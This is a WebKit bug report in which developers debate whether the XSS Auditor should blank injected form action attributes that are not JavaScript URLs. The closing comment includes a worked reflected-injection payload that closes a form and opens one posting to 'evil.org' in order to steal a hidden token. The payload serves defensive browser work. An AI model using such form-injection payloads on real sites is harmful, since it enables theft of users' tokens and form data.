Bug 72585
Summary: | XSS Auditor : <form> action is blocked even if it is not a JavaScript URL | ||
---|---|---|---|
Product: | WebKit | Reporter: | prakash.1729 |
Component: | WebCore Misc. | Assignee: | Nobody <webkit-unassigned> |
Status: | RESOLVED WONTFIX | ||
Severity: | Normal | CC: | abarth, ap, dbates, tsepez |
Priority: | P2 | Keywords: | XSSAuditor |
Version: | 528+ (Nightly build) | ||
Hardware: | Unspecified | ||
OS: | Linux |
prakash.1729
I observed that when I try to inject a FORM the "action" attribute is made empty even if it is not a JavaScript URL . So is this an exception ?
Attachments | ||
---|---|---|
Add attachment proposed patch, testcase, etc. |
Adam Barth
Yeah, we should only need to block JavaScript URLs.
(This is a false positive, so not a security bug.)
prakash.1729
Though it is a false positive according to the design, it is in-fact protecting against <form> injection which is good. It is the same with <iframe> injection where the src attribute is removed even if the src is not a JavaScript URL .
One more corner case is that <iframe> from a same domain can be injected successfully. I assume this as a design decision .
p.s I couldn't find an example in which detecting an injected form is a false positive
Thomas Sepez
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam sugests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when page contains:
<form action="http://good.com">
<input type="text" name="quantity" value="2">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
and the "quantity" input element contains an injection, and we reflect from the URL say
...?quantity="></form><form action="http://evil.org">
resulting in page:
<form action="http://good.com">
<input type="text" name="quantity" value=""></form><form action="http://evil.org">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
So when the user hits submit, we steal his formkey token (or other information from input fields).
Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.
Thanks heaps.